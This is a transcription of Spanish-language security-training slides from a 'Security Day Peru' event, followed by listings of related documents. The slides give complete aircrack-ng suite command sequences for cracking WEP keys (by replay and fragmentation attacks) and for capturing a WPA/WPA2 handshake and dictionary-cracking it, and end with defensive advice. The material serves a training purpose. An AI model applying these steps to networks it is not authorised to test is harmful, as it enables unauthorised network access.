SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

Tamaño: px
Comenzar la demostración a partir de la página:

Download "SECURITY DAY PERU. Ataques a las Redes Inalámbricas. Vulnerando Redes Inalámbricas WEP y WPA. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP"

Transcripción

1 SOLUTIONS FOR KEEPING YOUR BUSINESS UP Tel. +(507) Tel. +(1) Aptdo , Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Redes Inalámbricas Vulnerando Redes Inalámbricas WEP y WPA Technologies 1

2 Security Day> Perú> Agenda Lab 1. Explotando Vulnerabilidad de WEP con clientes inalámbricos Lab 2. Explotando Vulnerabilidad de WEP sin clientes inalámbricos Lab 3. Explotando Vulnerabilidad de WPA 2

3 Ataque a WEP con clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque con clientes (repetición) es viable en la mayoría de AP. 3

4 Lab del ataque WEP con clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 4

5 Lab del Ataque a WEP con clientes Ejecutamos la asociación al AP aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Realizamos la inyección de paquetes aireplay-ng -3 -e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 5

6 Ataque a WEP sin clientes Ésta vulnerabilidad aprovecha el empleo de RC4, contiene múltiples debilidades documentadas desde setiembre de La contraseña es simétrica (estática) y se comparte entre los puntos de acceso y los clientes (compartida). El ataque sin clientes (fragmentación) es viable en algunos tipos de AP, cuando no, se debe probar korek chop chop. 6

7 Lab del Ataque a WEP sin clientes Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de fragmentación. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 --encrypt wep -w ximark --bssid 00:19:5b:e0:22:2e -c 10 7

8 Lab del Ataque a WEP sin clientes Ejecutamos el ataque de fragmentación aireplay-ng e ximark -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 aireplay-ng -5 -b 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b mon0 Generamos el paquete a inyectar packetforge-ng -0 -a 00:19:5b:e0:22:2e -h 00:c0:ca:19:cd:4b -k l y fragment xor -w paquete Realizamos la inyección de paquetes aireplay-ng -2 -r paquete mon0 Recuperamos la contraseña del AP aircrack-ng -z -0 ximark-02.cap 8

9 Ataque a WPA/WPA2 Esta vulnerabilidad se basa en la captura del 4 way handshake, realizado en la asociación y autenticación de un cliente y un AP. Afecta a todos los dispositivos que empleen autenticación con cifrado TKIP. 9

10 Lab del ataque WPA/WPA2 Desde nuestro Backtrack, iniciamos el reconocimiento: iwconfig (visualizamos las interfaces inalámbricas) rmmod rtl8187 modprobe rtl8187 (cargamos el módulo de la tarjeta inalámbrica) airmon-ng start wlan0 (iniciamos la tarjeta en modo monitor) airodump-ng mon0 (capturamos los paquetes) Preparamos el ataque de inyección con clientes. rmmod rtl8187 modprobe rtl8187 airmon-ng start wlan0 10 airodump-ng mon0 -w ximark --bssid 00:19:5b:e0:22:2e -c 10 10

11 Lab del ataque a WPA/WPA2 Ejecutamos la asociación al AP aireplay-ng a 00:19:5b:e0:22:2e -c 00:c0:ca:19:cd:4b mon0 Recuperamos la contraseña del AP aircrack-ng w /carpeta/diccionario ximark-02.cap 11

12 Ataques a las Redes Inalámbricas> Soluciones Emplear contraseñas largas que no se puedan ubicar en diccionarios. No emplear WEP o WPA/WPA2 PSK en entornos empresariales. Actualice o reemplace los equipos que sólo soporten WEP. No se conecten a AP sospechosos. 12

ASALTANDO REDES WI-FI WEP / WPA

ASALTANDO REDES WI-FI WEP / WPA ASALTANDO REDES WI-FI WEP / WPA Aetsu alpha.aetsu@gmail.com Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Cifrado WEP Todos los ataques En esta parte del manual explicaré de forma

Más detalles

PREGUNTAS. Sí, preguntas al comienzo de la charla... =) - Quienes NO tienen redes inalámbricas en su casa?

PREGUNTAS. Sí, preguntas al comienzo de la charla... =) - Quienes NO tienen redes inalámbricas en su casa? PREGUNTAS Sí, preguntas al comienzo de la charla... =) - Quienes NO tienen redes inalámbricas en su casa? - Quienes NO tienen redes WIFI en su trabajo? - Quienes utilizan WEP? - Quienes utilizan WPA o

Más detalles

Auditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx. Linux/Aircrack

Auditoria Wireless. Cracking WEP & WPA keys. Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx. Linux/Aircrack Auditoria Wireless Cracking WEP & WPA keys Jorge Luis Hernandez C. lesthack@gmail.com http://lesthack.com.mx Linux/Aircrack Contenido Introducción WEP WPA Practicas Part 1 Razones por las cuales tomé el

Más detalles

WEP, WPA/WPA2 Cracking

WEP, WPA/WPA2 Cracking WEP, WPA/WPA2 Cracking By: Alfa-Omega Introduccion En este manual explicare como crackear claves wep, wpa y wpa2, para ello utilizare el live cd de backtrack 3 (beta) y la suite aircrack (la suite aircrack

Más detalles

Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija

Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija Guillermo López Leal, 2IM1 Introducción a la Seguridad Universidad Nebrija Avisos Sólo es una demostración con fines educativos [en serio, en España no es ilegal, pero en otros países sí] No hagáis nada

Más detalles

EL ARTE DEL HACKING. Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com

EL ARTE DEL HACKING. Libro de Ethical Hacking para entrenamiento sobre ataques informáticos. Contacto: whitehat.mexico@gmail.com Página 1 Edición patrocinada por WhiteHat México Descubre como es el Arte del Hacking de una visión de un White Hat. Por LSCA,CEH,ICSCE Carlos Alberto Castruita Rodríguez Edición Independiente 2015 Edición

Más detalles

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes.

SECURITY DAY PERU. Ataques a la familia de Sistemas Operativos Windows. Explotando Vulnerabilidades a Servicios / Ataques a Clientes. SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a la familia de Sistemas

Más detalles

Seguridad en redes inalámbricas. Vulnerabilidades del protocolo WEP

Seguridad en redes inalámbricas. Vulnerabilidades del protocolo WEP Seguridad en redes inalámbricas Vulnerabilidades del protocolo WEP Introducción Qué vamos a hacer? Observar fallos del protocolo WEP. Utilizar esos fallos para obtener la clave de una red wireless asegurada

Más detalles

Redes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red

Redes. Herramientas de red en GNU/Linux. Desactivar / activar bluetooth. rfkill block bluetooth. rfkill unblock bluetooth. Todas las interfaces de red 2016/01/27 19:48 1/6 Redes Redes Herramientas de red en GNU/Linux Desactivar / activar bluetooth rfkill block bluetooth rfkill unblock bluetooth Todas las interfaces de red ifconfig ifconfig wlan0 wlan0:

Más detalles

Inseguridad Wireless. Presentación Seguridad en Wireless Saltar la seguridad Wardriving Perversiones Cierre

Inseguridad Wireless. Presentación Seguridad en Wireless Saltar la seguridad Wardriving Perversiones Cierre Inseguridad Wireless Presentación Seguridad en Wireless Saltar la seguridad Wardriving Perversiones Cierre Presentación E-MIPS Electrónica e Informática ekoparty security conference NO trabajo en seguridad

Más detalles

Redes y servicios móviles

Redes y servicios móviles Redes y servicios móviles Prácticas de laboratorio José Ángel Vallejo Pinto (vallejo@uniovi.es) Universidad de Oviedo Área de Redes y servicios móviles Prácticas de laboratorio 1/7 Auditoría de seguridad

Más detalles

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP

SECURITY DAY PERU. Ataques a las Aplicaciones Web. Explotación de Aplicaciones Web. Technologies SOLUTIONS FOR KEEPING YOUR BUSINESS UP SOLUTIONS FOR KEEPING YOUR BUSINESS UP Email: info@ximark.com Tel. +(507) 271 5951 Tel. +(1) 928 752 1325 Aptdo. 55-0444, Paitilla. Panama City, Panama SECURITY DAY PERU Ataques a las Aplicaciones Web

Más detalles

Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad

Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad Índice de contenido Guía No. 1 Pruebas básicas en tarjeta WIFI para pruebas de seguridad... 1 Información de apoyo a la práctica...

Más detalles

#breaking80211. Esta obra se encuentra bajo la licencia Creative Commons 3.0 España:

#breaking80211. Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: #breaking80211 Aetsu Esta obra se encuentra bajo la licencia Creative Commons 3.0 España: 1 Índice Introducción... 3 Materiales/Herramientas utilizados... 4 Conceptos básicos... 5 -> Cambiar dirección

Más detalles

TUTORIAL DE AIRCRACK-NG

TUTORIAL DE AIRCRACK-NG TUTORIAL DE AIRCRACK-NG Taller Realizado en FLISOL Los Ángeles Abril 25 de 2009.- Paolo Norambuena paolo.norambuena@gmail.com AIRCRACK-NG Esta es una guía con fines educativos para el uso y manipulación

Más detalles

SEGURIDAD EN REDES WLAN

SEGURIDAD EN REDES WLAN UNIVERSIDAD TECNOLÓGICA NACIONAL -FACULTAD REGIONAL LA PLATA- SISTEMAS DE TRANSMISIÓN Y REDES INALÁMBRICAS SEGURIDAD EN REDES WLAN 1 Ing. RAPALLINI, José A. Ing. ROQUÉ, Francisco E. INTRODUCCIÓN SEGURIDAD

Más detalles

Trabajo Práctico: Cracking WEP

Trabajo Práctico: Cracking WEP Universidad de Buenos Aires Facultad De Ingeniería 2 do Cuatrimestre 2011 Trabajo Práctico: INTEGRANTES De Roovers, Raúl - 84.248 nari77@gmail.com Carracedo, Leandro - 83.291 leandrocarracedo@gmail.com

Más detalles

30 de Septiembre de 2010 Seminario de Tendencias y Evolución de las Tecnologías de la Información y Comunicaciones en Chile

30 de Septiembre de 2010 Seminario de Tendencias y Evolución de las Tecnologías de la Información y Comunicaciones en Chile 30 de Septiembre de 2010 Seminario de Tendencias y Evolución de las Tecnologías de la Información y Comunicaciones en Chile Paulo Colomés F. Docente Universidad Tecnológica de Chile Inacap Instructor CCNA

Más detalles

1. Configuración de una tarjeta de red en Linux...2. 2. Medidas de seguridad a configurar en el router...5

1. Configuración de una tarjeta de red en Linux...2. 2. Medidas de seguridad a configurar en el router...5 1. Configuración de una tarjeta de red en Linux...2 1.1 Comprobar que la tarjeta de red está detectada... 2 1.2 Comprobar la configuración... 3 1.3 Ficheros de configuración de la red en Linux... 3 1.3.1

Más detalles

Integrantes: Manuel Ramírez Carlos Polanco Bernardo Farías Profesor: Agustín J. González

Integrantes: Manuel Ramírez Carlos Polanco Bernardo Farías Profesor: Agustín J. González Integrantes: Manuel Ramírez Carlos Polanco Bernardo Farías Profesor: Agustín J. González Introducción WLAN es una amplia red inalámbrica que permite conectar un equipo a la red para acceder a Internet,

Más detalles

Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo.

Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo. Introducción Para poder obtener la clave de una red con cifrado WPA/WPA2, debemos capturar el Handshake de algún cliente y luego desencriptarlo. Para lo que no sepan lo que es el Handshake se genera en

Más detalles

Crackin WiFi networks with security enabled

Crackin WiFi networks with security enabled Crackin WiFi networks with security enabled En el articulo sobre cómo configurar la conexión a Internet ya hablamos de las diferentes formas que hay para proteger una red wireless (Wi-Fi), de las cuales

Más detalles

Redes WPA/WPA2 SU VULNERABILIDAD JAVIER RUZ MALUENDA BASTIAN RIVEROS VASQUEZ ANGEL VARAS ESCOBAR

Redes WPA/WPA2 SU VULNERABILIDAD JAVIER RUZ MALUENDA BASTIAN RIVEROS VASQUEZ ANGEL VARAS ESCOBAR Redes WPA/WPA2 SU VULNERABILIDAD JAVIER RUZ MALUENDA BASTIAN RIVEROS VASQUEZ ANGEL VARAS ESCOBAR Resumen A través de las redes con seguridad WPA-WPA2 mediante su descripción y características principales

Más detalles

Consideraciones Generales: Tradicionalmente, debido al medio de transmisión físico, las redes cableadas son más seguras que las redes inalámbricas.

Consideraciones Generales: Tradicionalmente, debido al medio de transmisión físico, las redes cableadas son más seguras que las redes inalámbricas. Consideraciones Generales: Tradicionalmente, debido al medio de transmisión físico, las redes cableadas son más seguras que las redes inalámbricas. Podemos pensar de forma hipotética en "aislar" una red

Más detalles

Seguridad en Redes Inalámbricas Leonardo Uzcátegui

Seguridad en Redes Inalámbricas Leonardo Uzcátegui Seguridad en Redes Inalámbricas Leonardo Uzcátegui Seguridad en WI-FI Fundamentos Los paquetes de información en las redes inalámbricas viajan en forma de ondas de radio. Las ondas de radio (en principio)

Más detalles

Lección 12: Seguridad en redes Wi Fi

Lección 12: Seguridad en redes Wi Fi Lección 12: Seguridad en redes Wi Fi D. Raúl Siles raul@taddong.com Fundador y Analista de Seguridad de Taddong Introducción a la seguridad de las redes Wi Fi Redes inalámbricas o redes Wi Fi Estándares

Más detalles

Conceptos. Existen 3 tipos de frames dentro de una WLAN:

Conceptos. Existen 3 tipos de frames dentro de una WLAN: Conceptos WLAN Wireless local área network, esta será nuestra red inalámbrica la cual tendremos como objetivo a lo largo del taller WEP Seguridad equivalente a cableado (Wired equivalent Protection) WPA

Más detalles

Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP

Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP Índice de contenido Guía 3. Identificando SSID ocultos y Evadiendo filtros MAC del AP... 1 Ataque III Descifrando claves WEP... 2 Fase

Más detalles

Introducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng

Introducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng Introducción a la Seguridad WiFi con Aircrack-ng Thomas d Otreppe, Author of Aircrack-ng 1 IEEE 802.11 Institute of Electrical and Electronics Engineers Autoridad Líder Segmentada en Comités y grupos de

Más detalles

Introducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng

Introducción a la Seguridad WiFi con Aircrack-ng. Thomas d Otreppe, Author of Aircrack-ng Introducción a la Seguridad WiFi con Aircrack-ng Thomas d Otreppe, Author of Aircrack-ng 1 IEEE 802.11 Institute of Electrical and Electronics Engineers Autoridad Líder Segmentada en Comités y grupos de

Más detalles

Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2

Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Sistemas de seguridad en redes inalámbricas: WEP, WAP y WAP2 Calle San Rafael, 14 28108 Alcobendas (Madrid) 902 90 10 20 www.acens.com Introducción Actualmente una de las formas más utilizadas para conectarse

Más detalles

Configuración de un punto de acceso inalámbrico

Configuración de un punto de acceso inalámbrico 0 - Conexión Configuración de un punto de acceso inalámbrico Objetivo: Configuración de un punto de acceso (Senao 3054 CB3 Plus deluxe) a través del interface web. Diferenciando los modos: Bridge y AP.

Más detalles

Protocolos y técnicas alternativas al WEP. En este capítulo se presentan algunos protocolos y técnicas que ofrecen mayores

Protocolos y técnicas alternativas al WEP. En este capítulo se presentan algunos protocolos y técnicas que ofrecen mayores Capítulo 4 Protocolos y técnicas alternativas al WEP. En este capítulo se presentan algunos protocolos y técnicas que ofrecen mayores garantías en seguridad en redes inalámbricas, eliminando las debilidades

Más detalles

Aplicación de tecnologías Wireless para operativas en situaciones de emergencia

Aplicación de tecnologías Wireless para operativas en situaciones de emergencia Aplicación de tecnologías Wireless para operativas en situaciones de emergencia Javier Coso - Mayo 2007 Dirección General de Protección Civil y Emergencias - Red Radio de Emergencia Aplicación de tecnologías

Más detalles

sanson seguridadwireless.net

sanson seguridadwireless.net Este manual ha sido creado por sanson, para seguridadwireless.net en colaboracion con Aqprox La intención del mismo es divulgar los conocimientos que he ido adquiriendo durante estos años El manual es

Más detalles

BRUTEFORCE WPS CON INFLATOR

BRUTEFORCE WPS CON INFLATOR BRUTEFORCE WPS CON INFLATOR Por Sergio Baamonde Álvarez En este artículo trataremos cómo aprovecharnos de una vulnerabilidad en el protocolo WPS para obtener la clave de seguridad WPA de una red inalámbrica

Más detalles

Agenda. Introducción Tecnologías Wireless: Clasificación Dispositivos Wireless Mecanismos de autenticación WEP y WPA

Agenda. Introducción Tecnologías Wireless: Clasificación Dispositivos Wireless Mecanismos de autenticación WEP y WPA Wireless Hacking Agenda Introducción Tecnologías Wireless: Clasificación Dispositivos Wireless Mecanismos de autenticación WEP y WPA Autenticación Abierta Autenticación por PSK Autenticación por Dirección

Más detalles

En internet es muy común pillar tutoriales para asegurar nuestra red WIFI con una contraseña WEP, ya

En internet es muy común pillar tutoriales para asegurar nuestra red WIFI con una contraseña WEP, ya En internet es muy común pillar tutoriales para asegurar nuestra red WIFI con una contraseña WEP, ya que este tipo de cifrado sigue siendo más utilizado por el usuario de casa. Tomaremos esta constante

Más detalles

Auditoría Wireless: WiFiSlax 2.0

Auditoría Wireless: WiFiSlax 2.0 Auditoría Wireless: WiFiSlax 2.0 Tecnologías de Red Juan Esparza Torregrosa Andrea Cascant Vañó 1 Diana Aparisi Martín Contenido Introducción al mundo Wireless...4 Qué es WLAN y WIFI?...4 Cuáles son los

Más detalles

Guía de instalación rápida DPR-1260. with 3G Mobile Video

Guía de instalación rápida DPR-1260. with 3G Mobile Video Guía de instalación rápida DPR-1260 Wireless Wireless Servidor G de Print USB impresión 2.0 USB Server multifunción with 3G Mobile Video Adapter Requisitos del sistema Red inalámbrica 802.11b/g o por cable

Más detalles

Seguridad Y Auditoria Wireless

Seguridad Y Auditoria Wireless Seguridad Y Auditoria Wireless Integrantes: -Héctor Durán -Katherine Zumelzu Profesor: Rodrigo Tapia Santis Índice Contenido Seguridad... 3 Auditoria... 3 Pero qué es Seguridad y Auditoría Wireless?...

Más detalles

Facultad de Ciencias y Tecnología

Facultad de Ciencias y Tecnología Facultad de Ciencias y Tecnología TEORÍA Y APLICACIÓN DE LA INFORMÁTICA 2 SEGURIDAD WIFI Alumna: María Isabel Ortíz Gómez. Matrícula Nº: 49.743. Curso: 5º - 10º Semestre. Profesor: Juan de Urraza Asunción

Más detalles

Auditoria de Redes. Patrick Hernández Cuamatzi

Auditoria de Redes. Patrick Hernández Cuamatzi Auditoria de Redes Patrick Hernández Cuamatzi Redes de Área Local Uso generalizado de sistemas y equipos de cómputo. Derivado de esto surge la necesidad de comunicarse entre equipos, lo que conlleva la

Más detalles

PRACTICA DE REDES Redes Ad Hoc

PRACTICA DE REDES Redes Ad Hoc PRACTICA DE REDES Redes Ad Hoc En esta práctica vamos a proceder a montar una red ad hoc, es decir, dos o más dispositivos conectados entre sí directamente de manera inalámbrica, sin ningún tipo de punto

Más detalles

Manual de configuración de la red inalámbrica. eduroam. en Nokia (Symbian S60)

Manual de configuración de la red inalámbrica. eduroam. en Nokia (Symbian S60) Manual de configuración de la red inalámbrica eduroam en Nokia (Symbian S60) Manual de configuración de la red inalámbrica eduroam en Nokia (Symbian S60) Índex Introducción... 1 1 Instalación del certificado

Más detalles

Capítulo 1. Introducción

Capítulo 1. Introducción Capítulo 1. Introducción Nombre del Tema Aspectos de seguridad en aplicaciones basadas en WIFI. Asesor: Dr. Oleg Starostenko Basarab Actualidad y Definición del problema Desde hace ya tiempo nos hemos

Más detalles

Manual de acceso a unileon

Manual de acceso a unileon Manual de acceso a unileon Manual de acceso a unileon... 1 1 Introducción... 2 2 Alta en servicios añadidos.... 3 3 Acceso a la red... 4 3.1 Windows XP... 4 3.2 Otros sistemas operativos... 9 4 Requisitos

Más detalles

Metodología para la verificación de la seguridad en redes WI-FI residenciales y PYME.

Metodología para la verificación de la seguridad en redes WI-FI residenciales y PYME. Metodología para la verificación de la seguridad en redes WI-FI residenciales y PYME. Methodology for testing network security residential and SME WI-FI. Victor Cuchillac ISSN 1992-6510 40 Año 14, N 40,

Más detalles

Auditoría WiFi. Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es. Diciembre de 2013

Auditoría WiFi. Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es. Diciembre de 2013 Auditoría WiFi Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es Diciembre de 2013 GSyC - 2013 Auditoría WiFi 1 c 2013 GSyC Algunos derechos reservados. Este trabajo

Más detalles

Título: Técnicas de ataque sobre clientes Wi-Fi. Fecha: Jueves, 30 de octubre 9:30 a 20:00h. Formador: Raúl Siles

Título: Técnicas de ataque sobre clientes Wi-Fi. Fecha: Jueves, 30 de octubre 9:30 a 20:00h. Formador: Raúl Siles Título: Técnicas de ataque sobre clientes Wi-Fi Fecha: Jueves, 30 de octubre 9:30 a 20:00h Formador: Raúl Siles Raúl Siles es fundador y analista de seguridad de DinoSec. Durante más de una década ha aplicado

Más detalles

CONFIGURACIÓN DEL SOFTWARE ODYSSEY PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UPM. Mac OS X

CONFIGURACIÓN DEL SOFTWARE ODYSSEY PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UPM. Mac OS X CONFIGURACIÓN DEL SOFTWARE ODYSSEY PARA LA CONEXIÓN A LA RED INALÁMBRICA DE LA UPM Mac OS X Contenido Mac OS X... 3 Configuración del software Odyssey... 3 Configuración de perfiles adicionales... 9 Redes

Más detalles

CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN

CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN CENTRO DE INVESTIGACIÓN Y DE ESTUDIOS AVANZADOS DEL IPN Guía de configuración para establecer una conexión a la red icinvestav con el Sistema Operativo Windows 7. En este documento se describen los pasos

Más detalles

TEMA 7: Configuraciones básicas en red.

TEMA 7: Configuraciones básicas en red. TEMA 7: Configuraciones básicas en red. Objetivos: Aprendizaje de la configuración de red cableada e inalámbrica en Ubuntu. Conocimiento de la utilización de interfaces de red inalámbricas compatibles

Más detalles

Seguridad en UDCWIFI

Seguridad en UDCWIFI Seguridad en UDCWIFI Índice Introducción Seguridad en redes inalámbricas WIFI WEP, WPA Y 802,11i: Descripción, Debilidades y Ataques Caso concreto: UDCWIFI Introducción Hablar de seguridad en redes inalámbricas,

Más detalles

WPA vs WPA2. Ana Hernández Rabal 21-12-2007

WPA vs WPA2. Ana Hernández Rabal 21-12-2007 WPA vs WPA2 Ana Hernández Rabal 21-12-2007 Índice Introducción WPA vs WPA2 Autenticación PSK 802.1x EAP EAPOL RADIUS Generación e intercambio de llaves Vulnerabilidades WPA Ataques WPA / WPA2-PSK Líneas

Más detalles

Cablemodem WIFI Cisco DPC2420 Manual del usuario

Cablemodem WIFI Cisco DPC2420 Manual del usuario TeleCentro BANDA ANCHA 0 Cablemodem WIFI Manual del Usuario Marca: Cisco (Scientific Atlanta) Modelo: DPC2420 IMPORTANTE: el presente manual está destinado a usuarios avanzados que requieren, por sus propios

Más detalles

Configuración básica del Router WIFI Zyxel NBG334W para el servicio AVIPLUS (Iberbanda) Modelo: Zyxel NBG334W Versión: 3.60(BGX.1)

Configuración básica del Router WIFI Zyxel NBG334W para el servicio AVIPLUS (Iberbanda) Modelo: Zyxel NBG334W Versión: 3.60(BGX.1) Configuración básica del Router WIFI Zyxel NBG334W para el servicio AVIPLUS (Iberbanda) Modelo: Zyxel NBG334W Versión: 3.60(BGX.1) ... 6... 7... 14... 15... 18... 20... 21... 22... 23... 24... 27... 27...

Más detalles

TUTORIAL: Cómo hacer más segura nuestra red MAC OS X

TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TUTORIAL: Cómo hacer más segura nuestra red MAC OS X TABLA DE CONTENIDOS INTRODUCCIÓN 3 CAMBIAR CONTRASEÑA 4 FILTRAR EL ACCESO POR MAC 5 CIFRADO WEP O WPA 6 DESACTIVAR EL BROADCASTING SSID 6 DESACTIVAR

Más detalles

sanson seguridadwireless.net

sanson seguridadwireless.net Este manual ha sido creado por sanson, para seguridadwireless.net La intención del mismo es divulgar los conocimientos que he ido adquiriendo durante estos años El manual es de libre distribución y eres

Más detalles

Guía para la configuración de la red inalámbrica corporativa de la Universidad de Oviedo

Guía para la configuración de la red inalámbrica corporativa de la Universidad de Oviedo Guía para la configuración de la red inalámbrica corporativa de la Universidad de Oviedo Configuración de la red inalámbrica con cifrado WPA (Uniovi- WiFi) y autenticación PEAP. Detección de las redes

Más detalles

Manual de Configuración WI-FI Alumnos UTP

Manual de Configuración WI-FI Alumnos UTP Mesa de Ayuda Manual de Configuración WI-FI Alumnos UTP Versión 1.0 Publicado: 09/07/2014 Copyright 2014 Universidad Tecnológica del Perú S.A.C No esta permitida su distribución sin el consentimiento previo

Más detalles

En la imagen de abajo nos encontramos con la opción de "Clonar" la dirección MAC de la placa de red de nuestra PC, esto se hace en casos en los que

En la imagen de abajo nos encontramos con la opción de Clonar la dirección MAC de la placa de red de nuestra PC, esto se hace en casos en los que En este tutorial vamos a ver lo pasos para configurar la conexión a internet del Router Wireless NG-3304N junto con algunos parámetros básicos sobre la configuración Wireless. Luego de encender el router

Más detalles

Ataques Wifi Riesgos y Contramedidas. Ing. PPT CISO Jorge Luis Martinez Valda

Ataques Wifi Riesgos y Contramedidas. Ing. PPT CISO Jorge Luis Martinez Valda Ataques Wifi Riesgos y Contramedidas Ing. PPT CISO Jorge Luis Martinez Valda About Me About Me Ingeniero de Sistema egresado de la Universidad del Valle desde el 2008. Fan de la seguridad informatica.

Más detalles

Seguridad en Redes Inalámbricas

Seguridad en Redes Inalámbricas Seguridad en Redes Inalámbricas Son muchos los motivos para preocuparnos por la seguridad de una red inalámbrica. Por ejemplo, queremos evitar compartir nuestro ancho de banda públicamente. Tendremos situaciones

Más detalles

Seguridad en Redes Wireless 802.11x

Seguridad en Redes Wireless 802.11x Seguridad en Redes Wireless 802.11x Redes de Ordenadores Móviles Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes@gsyc.es Diciembre de 2009 GSyC - 2009 Seguridad en redes Wireless

Más detalles

Auditoría de redes WiFi

Auditoría de redes WiFi Auditoría de redes WiFi Redes de Ordenadores Móviles - GSyC Índice 0. Introducción 1 1. Configuración de una red 820.11 ad-hoc con cifrado WEP 2 1.1. Configuración de la máquina virtual ALICE.......................

Más detalles

Guía rápida Arris TG862

Guía rápida Arris TG862 Guía rápida Arris TG862 1. Introducción El nuevo cable módem router Arris TG862 introduce nuevas funcionalidades que hasta ahora ningún equipo doméstico era capaz de hacer. Esta guía pretende servir para

Más detalles

MUM Argentina 2015 Buenos Aires. CAPsMAN para redes empresariales

MUM Argentina 2015 Buenos Aires. CAPsMAN para redes empresariales MUM Argentina 2015 Buenos Aires CAPsMAN para redes empresariales Prozcenter - Quienes somos? Empresa joven, con 12 años de experiencia en Networking y TI. Compuesta por profesionales de la industria tecnológica

Más detalles

TRABAJO FIN DE MÁSTER

TRABAJO FIN DE MÁSTER UNIVERSIDAD OBERTA DE CATALUNYA UNIVERSIDAD ROVIRA I VIRGILI UNIVERSIDAD AUTÓNOMA DE BARCELONA MÁSTER INTERUNIVERSITARIO DE SEGURIDAD DE LAS TECNOLOGIAS DE LA INFORMACIÓN Y DE LAS COMUNICACIONES (MISITIC)

Más detalles

Examen Cisco Online CCNA4 V4.0 - Capitulo 6. By Alen.-

Examen Cisco Online CCNA4 V4.0 - Capitulo 6. By Alen.- Cuáles de las siguientes son dos afirmaciones verdaderas acerca de DSL? (Elija dos opciones). los usuarios se encuentran en un medio compartido usa transmisión de señal de RF el bucle local puede tener

Más detalles

Guía de conexión. Sistemas operativos compatibles. Guía de conexión. Página 1 de 5

Guía de conexión. Sistemas operativos compatibles. Guía de conexión. Página 1 de 5 Página 1 de 5 Guía de conexión Sistemas operativos compatibles Con el CD Software y documentación, puede instalar el software de la impresora en los siguientes sistemas operativos: Windows 8 Windows 7

Más detalles

Departamento de Sistemas Telemáticos y Computación (GSyC) Diciembre de 2012

Departamento de Sistemas Telemáticos y Computación (GSyC) Diciembre de 2012 Sniffers Departamento de Sistemas Telemáticos y Computación (GSyC) gsyc-profes (arroba) gsyc.es Diciembre de 2012 GSyC - 2012 Captura de tráfico con Sniffers 1 c 2012 GSyC Algunos derechos reservados.

Más detalles

Guía de configuración de Wi-Fi

